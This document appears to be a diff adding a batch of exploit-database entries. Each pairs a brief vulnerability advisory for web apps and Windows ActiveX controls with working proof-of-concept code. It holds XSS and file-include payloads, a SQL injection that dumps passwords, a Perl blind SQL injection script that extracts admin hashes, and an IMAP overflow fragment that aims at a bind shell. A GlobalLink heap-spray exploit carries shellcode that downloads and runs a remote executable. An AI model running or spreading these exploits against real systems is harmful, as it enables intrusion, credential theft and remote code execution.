platforms/php/webapps/30733.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26301/info
+
+phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks.
+
+This issue affects versions prior to phpMyAdmin 2.11.1.2. 
+
+http://www.example.com/phpMyAdmin/server_status.php/"><script>alert('xss')</script> 

platforms/php/webapps/30734.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26312/info
+
+Helios Calendar is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Helios Calendar 1.2.1 Beta; other versions may also be affected. 
+
+http://www.example.com/calendar/admin/index.php?msg=1&username=[XSS] 

platforms/php/webapps/30735.txt

@@ -0,0 +1,9 @@
+source: www.securityfocus.com/bid/26318/info
+
+PHP Helpdesk is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+PHP Helpdesk 0.6.16 is vulnerable to this issue; other versions may also be affected. 
+
+http://www.example.com/index.php?whattodo=../../../../../../../../../../../etc/passwd%00 

platforms/php/webapps/30737.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26329/info
+
+Galmeta Post is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+Galmeta Post 0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.comtmp/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=[shell] 

platforms/php/webapps/30738.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26330/info
+
+E-Vendejo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+E-Vendejo 0.2 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/articles.php?lingvo=ca&id=10 UNION ALL SELECT null,null,concat(usr_login,0x23,usr_pass),null,null FROM usuaris/* 

platforms/php/webapps/30739.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/26331/info
+
+JLMForo System is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. 
+
+http://www.example.com/PATH/buscador.php?clave=[XSS] 

platforms/php/webapps/30741.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26335/info
+
+easyGB is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Exploiting this issue may allow an unauthorized user to view files and execute local scripts.
+
+easyGB 2.1.1 is vulnerable to this issue; other versions may also be affected. 
+
+http://www.example.com/index.php?DatabaseType=[Local File]%00 

platforms/php/webapps/30745.html

@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/26358/info
+
+MS-TopSites is prone to an unauthorized-access vulnerability and an HTML-injection vulnerability because the application fails to sufficiently sanitize user-supplied data.
+
+An attacker can exploit these issues to gain elevated privileges on the affected application, execute arbitrary code within the context of the webserver, and steal cookie-based authentication credentials. 
+
+<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
+<body bgcolor="black" text="white">
+<form action="http://localhost:81/modules.php?name=MS_TopSites&file=edit " method="post">
+<input size="92" type="text" value=&#039;&#039; name="sname"> SiteNameTitle [sname] (not Target it must be changed in the source) <br />
+<input size="92" type="text" value="" name="uname"> Username [uname] <br />
+<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
+<input size="92" type="text" value="mail@url.com" name="email"> Email<br />
+<input size="92" type="text" value=&#039;&#039; name="bottonurl"> BottonUrl<br />
+<input size="92" type="text" value="Art" name="cat"> Cat <br />
+<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
+<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
+<input type="submit" value="submit"><br />
+</body></form>
+</html>
+

platforms/php/webapps/30746.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26375/info
+
+Computer Associates SiteMinder Web Agent is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+We were not told which versions are affected. We will update this BID as more information emerges. 
+
+https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=[XSS] https://www.example.com/siteminderagent/forms/smpwservices.fcc?SMAUTHREASON=1)alert(document.cookie);}function+drop(){if(0 

platforms/php/webapps/30748.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26392/info
+
+Xoops Mylinks module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+Exploiting this vulnerability could permit remote attackers to pass malicious input to database queries, resulting in the modification of query logic or other attacks.
+
+Xoops 2.0.17.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com.com/modules/mylinks/brokenlink.php?lid=1%20OR%201=2 

platforms/php/webapps/30750.pl

@@ -0,0 +1,119 @@
+source: http://www.securityfocus.com/bid/26406/info
+
+The PHP-Nuke Advertising Module is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. 
+
+
+#!/usr/bin/perl
+#Product: PHP-Nuke Module Advertising
+#BugFounder: 0x90
+#HomePage: WwW.0x90.COM.Ar
+#Problem: Blind SQL Injection
+
+
+
+use strict;
+use warnings;
+use LWP;
+use Time::HiRes;
+use IO::Socket;
+
+
+my $host = "http://[url]/modules.php?name=Advertising";
+
+my $useragent = LWP::UserAgent->new;
+my $metodo = HTTP::Request->new(POST =$host);
+
+my $post;
+my $inicio;
+my $risposta;
+my $fine;
+my $tiempodefault;
+my $tiempo;
+my $i;
+my $j;
+my $hash;
+my @array;
+
+@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
+
+
+$post="login=a&pass=a&op=client_valid";
+$tiempodefault=richiesta($post);
+$hash="";
+
+#QUERY RISULTANTE
+
+#SELECT * FROM nuke_banner_clients WHERE login='a' UNION SELECT
+0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`,
+1,1))=112),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE
+`radminsuper`=1/*
+
+
+for ($i=1;$i<33;$i++)
+{
+for ($j=0;$j<16;$j++)
+{
+ $post="login=a' UNION SELECT 0,0,0,0,0,0, IF((ASCII(SUBSTRING(`pwd`," . $i
+. ",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM
+nuke_authors WHERE `radminsuper`=1/*&pass=a' UNION SELECT 0,0,0,0,0,0,
+IF((ASCII(SUBSTRING(`pwd`," . $i . ",1))=".
+$array[$j]."),benchmark(200000000,CHAR(0)),'falso') FROM nuke_authors WHERE
+`radminsuper`=1/*&op=client_valid";
+ $tiempo=richiesta($post);
+ aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
+ if($tiempo>10)
+ {
+  $tiempo=richiesta($post);
+  aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
+  if($tiempo>10)
+  {
+   $hash .=chr($array[$j]);
+   aggiorna($host,$tiempodefault,$j,$hash,$tiempo,$i);
+   $j=200;
+  }
+ }
+
+
+}
+if($i==1)
+{
+ if($hash eq "")
+ {
+  $i=200;
+  print "El atake Fallo\n";
+ }
+}
+}
+
+print "Atake Terminado\n\n";
+
+system("pause");
+
+
+sub richiesta{
+$post=$_[0];
+$metodo->content_type('application/x-www-form-urlencoded');
+  $metodo->content($post);
+$inicio=Time::HiRes::time();
+$risposta=$useragent->request($metodo);
+$risposta->is_success or die "$host : ",$risposta->message,"\n";
+$fine=Time::HiRes::time();
+$tiempo=$fine-$inicio;
+return $tiempo
+}
+
+sub aggiorna{
+system("cls");
+@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
+print "PHP-Nuke Module Advertising Blind SQL Injection\n";
+print "by 0x90\n";
+print "Visit: WwW.0x90.CoM.Ar\n\n";
+print "Victima : " . $_[0] . "\n";
+print "Tiempo Default : " . $_[1] . " secondi\n";
+print "Hash Bruteforce : " . chr($array[$_[2]]) . "\n";
+print "Bruteforce n Caracter Hash : " . $_[5] . "\n";
+print "Tiempo sql : " . $_[4] . " secondi\n";
+print "Hash : " . $_[3] . "\n";
+}

platforms/php/webapps/30751.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26407/info
+
+Miro Broadcast Machine is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue allows attackers to execute arbitrary HTML or script code in a user's browser session in the context of an affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects Broadcast Machine 0.9.9.9; other versions may also be affected.
+
+<form action="http://www.example.com/login.php" method="post"><input type="text" name="username" value='"<script>alert(1)</script>'><input type="submit"></form> 

platforms/php/webapps/30752.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26408/info
+
+Eggblog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Eggblog 3.1.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/home/rss.php/<script>alert(1)</script> 

platforms/php/webapps/30753.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26410/info
+
+AutoIndex PHP Script is prone to a remote denial-of-service vulnerability because the application fails to properly handle unexpected input.
+
+Successfully exploiting this issue allows remote attackers to consume excessive CPU resources, potentially denying service to legitimate users.
+
+AutoIndex PHP Script 2.2.2 and 2.2.3 are vulnerable to this issue; prior versions may also be affected.
+
+http://www.example.com/AutoIndex/index.php?dir=%00 

platforms/unix/dos/30714.pl

@@ -0,0 +1,27 @@
+source: http://www.securityfocus.com/bid/26219/info
+
+IBM Lotus Domino Server is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it to an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial of service.
+
+An exploit is available for Lotus Domino Server running on Windows platforms. It is not known if other platforms are affected.
+
+This issue may be related to the IMAP buffer-overflow vulnerability described in BID 26176.
+
+Error: Invalid username or password!\n";
+    exit;
+}
+
+print "[+] Successfully logged in.\n".
+      "[+] Trying to overwrite and control the SE handler...\n";
+
+$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" );
+$sock->recv( $recv, 1024 );
+$sock->send( "$mailbox\r\n" );
+$sock->recv( $recv, 1024 );
+$sock->send( "a003 LSUB arg1 arg2\r\n" );
+sleep( 3 );
+close( $sock );
+
+print "[+] Done. Now check for a bind shell on $ip:4444!\n";
+

platforms/windows/dos/30749.html

@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/26405/info
+
+Microsoft Office Web Component is prone to a denial-of-service vulnerability because of a memory access violation.
+
+Attackers can exploit this issue to crash Internet Explorer and deny service to legitimate users.
+
+This issue affects OWC11 for Microsoft Office 2003. 
+
+<!--
+written by e.b.
+-->
+<html>
+<head>
+ <script language="JavaScript" DEFER>
+   function Check() {
+     var obj = new ActiveXObject("OWC11.DataSourceControl");
+     obj.XMLDataTarget = "A";
+ }
+</script>
+</head>
+<body onload="JavaScript: return Check();" />
+</html>

platforms/windows/remote/30720.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/26244/info
+
+GlobalLink is prone to a stack-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions.
+
+GlobalLink 2.7.0.8 is affected by this issue; other versions may also be vulnerable. 
+
+<body> <script>window.onerror=function(){return true;}</script> <object classid="clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69" style='display:none' id='target'></object> <SCRIPT language="javascript"> var shellcode = unescape(""+""+""+"%u9090"+""+""+""+"%u9090"+ ""+""+""+"%uefe9"+""+""+"%u0000"+""+""+"%u5a00"+""+""+"%ua164"+""+""+"%u0030"+""+""+"%u0000"+""+""+"%u408b"+""+""+"%u8b0c" + ""+""+""+"%u1c70"+""+""+"%u8bad"+""+""+"%u0840"+""+""+"%ud88b"+""+""+"%u738b"+""+""+"%u8b3c"+""+""+"%u1e74"+""+""+"%u0378" + ""+""+""+"%u8bf3"+""+""+"%u207e"+""+""+"%ufb03"+""+""+"%u4e8b"+""+""+"%u3314"+""+""+"%u56ed"+""+""+"%u5157"+""+""+"%u3f8b" + ""+""+""+"%ufb03"+""+""+"%uf28b"+""+""+"%u0e6a"+""+""+"%uf359"+""+""+"%u74a6"+""+""+"%u5908"+""+""+"%u835f"+""+""+"%u04c7" + ""+""+""+"%ue245"+""+""+"%u59e9"+""+""+"%u5e5f"+""+""+"%ucd8b"+""+""+"%u468b"+""+""+"%u0324"+""+""+"%ud1c3"+""+""+"%u03e1" + ""+""+""+"%u33c1"+""+""+"%u66c9"+""+""+"%u088b"+""+""+"%u468b"+""+""+"%u031c"+""+""+"%uc1c3"+""+""+"%u02e1"+""+""+"%uc103" + ""+""+""+"%u008b%uc303"+""+""+"%ufa8b"+""+""+"%uf78b"+""+""+"%uc683"+""+""+"%u8b0e"+""+""+"%u6ad0"+""+""+"%u5904" + ""+""+""+"%u6ae8"+""+""+"%u0000"+""+""+"%u8300"+""+""+"%u0dc6"+""+""+"%u5652"+""+""+"%u57ff"+""+""+"%u5afc"+""+""+"%ud88b" + ""+""+""+"%u016a"+""+""+"%ue859"+""+""+"%u0057"+""+""+"%u0000"+""+""+"%uc683"+""+""+"%u5613"+""+""+"%u8046"+""+""+"%u803e" + ""+""+""+"%ufa75"+""+""+"%u3680"+""+""+"%u5e80"+""+""+"%uec83"+""+""+"%u8b40"+""+""+"%uc7dc"+""+""+"%u6303"+""+""+"%u646d" + ""+""+""+"%u4320"+""+""+"%u4343"+""+""+"%u6643"+""+""+"%u03c7"+""+""+"%u632f"+""+""+"%u4343"+""+""+"%u03c6"+""+""+"%u4320" + ""+""+""+"%u206a"+""+""+"%uff53"+""+""+"%uec57"+""+""+"%u04c7"+""+""+"%u5c03"+""+""+"%u2e61"+""+""+"%uc765"+""+""+"%u0344" + ""+""+""+"%u7804"+""+""+"%u0065"+""+""+"%u3300"+""+""+"%u50c0"+""+""+"%u5350"+""+""+"%u5056"+""+""+"%u57ff"+""+""+"%u8bfc" + ""+""+""+"%u6adc"+""+""+"%u5300%u57ff"+""+""+"%u68f0"+""+""+"%u2451"+""+""+"%u0040"+""+""+"%uff58"+""+""+"%u33d0" + ""+""+""+"%uacc0"+""+""+"%uc085"+""+""+"%uf975"+""+""+"%u5251"+""+""+"%u5356"+""+""+"%ud2ff"+""+""+"%u595a"+""+""+"%ue2ab" + ""+""+""+"%u33ee"+""+""+"%uc3c0"+""+""+"%u0ce8"+""+""+"%uffff"+""+""+"%u47ff"+""+""+"%u7465"+""+""+"%u7250"+""+""+"%u636f" + ""+""+""+"%u6441"+""+""+"%u7264"+""+""+"%u7365"+""+""+"%u0073"+""+""+"%u6547"+""+""+"%u5374"+""+""+"%u7379"+""+""+"%u6574" + ""+""+""+"%u446d"+""+""+"%u7269"+""+""+"%u6365"+""+""+"%u6f74"+""+""+"%u7972"+""+""+"%u0041"+""+""+"%u6957"+""+""+"%u456e" + ""+""+""+"%u6578"+""+""+"%u0063"+""+""+"%u7845"+""+""+"%u7469"+""+""+"%u6854"+""+""+"%u6572"+""+""+"%u6461"+""+""+"%u4c00" + ""+""+""+"%u616f"+""+""+"%u4c64"+""+""+"%u6269"+""+""+"%u6172%u7972"+""+""+"%u0041"+""+""+"%u7275"+""+""+"%u6d6c" + ""+""+""+"%u6e6f"+""+""+"%u5500"+""+""+"%u4c52"+""+""+"%u6f44"+""+""+"%u6e77"+""+""+"%u6f6c"+""+""+"%u6461"+""+""+"%u6f54" + ""+""+""+"%u6946"+""+""+"%u656c"+""+""+"%u0041"+""+""+"%u7468"+""+""+"%u7074"+""+""+"%u2f3a"+""+""+"%u702f"+""+""+"%u6369" + ""+""+""+"%u312e%u2e36"+""+""+"%u6776"+""+""+"%u532f"+""+""+"%u3633"+""+""+"%u2f38"+""+""+"%u3353"+""+""+"%u3836" + ""+""+""+"%u2e32"+""+""+"%u7865"+""+""+"%u8065"+""+""+"%u0000"); </script> <SCRIPT language="javascript"> var fsk51d2sl = "63e23c122"; var bigblock = unescape(""+""+"%u9090"+""+"%u9090"); var fsk51d2sl = "63e23c122"; var headersize = 20; var fsk51d2sl = "63e23c122"; var slackspace = headersize+shellcode.length; var fsk51d2sl = "63e23c122"; while (bigblock.length<slackspace) bigblock+=bigblock; var fsk51d2sl = "63e23c122"; fillblock = bigblock.substring(0, slackspace); var fsk51d2sl = "63e23c122"; block = bigblock.substring(0, bigblock.length-slackspace); var fsk51d2sl = "63e23c122"; while(block.length+slackspace<0x40000) block = block+block+fillblock; var fsk51d2sl = "63e23c122"; memory = new Array(); var fsk51d2sl = "63e23c122"; for (x=0; x<300; x++) memory[x] = block +shellcode; var fsk51d2sl = "63e23c122"; var buffer = ''; var fsk51d2sl = "63e23c122"; while (buffer.length < 164) buffer+="A"; var fsk51d2sl = "63e23c122"; buffer=buffer+"\x0a\x0a\x0a\x0a"+buffer; var fsk51d2sl = "63e23c122"; ok="ok"; var fsk51d2sl = "63e23c122"; target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok ); var fsk51d2sl = "63e23c122"; </script? </body> <mEtA Http-Equiv="Content-TypE" content="TeXt/htMl; CharSet=Us-AsCiI" /> /************************************************************************************************** ????????C:\Program Files\GlobalLink\Game\Share\GLChat.ocx, GlobalLink ? CLSID:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69 ??????? http://pic.16.vg/S368/S3682.exe ??????Exploits???????????????0-Day /************************************************************************************************** 

platforms/windows/remote/30730.txt

@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/26288/info
+
+
+SonicWALL SSL VPN Client is prone to multiple remote vulnerabilities. The issues occur in different ActiveX controls and include arbitrary-file-deletion and multiple stack-based buffer-overflow vulnerabilities.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the affected application and delete arbitrary files on the client's computer. Failed exploit attempts will result in denial-of-service conditions.
+
+These issues affect SonicWALL SSL VPN 1.3.0.3 software as well as WebCacheCleaner 1.3.0.3 and NeLaunchCtrl 2.1.0.49 ActiveX controls; other versions may also be vulnerable. 
+
+dim o
+Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
+o.FileDelete("c:\bla\bla")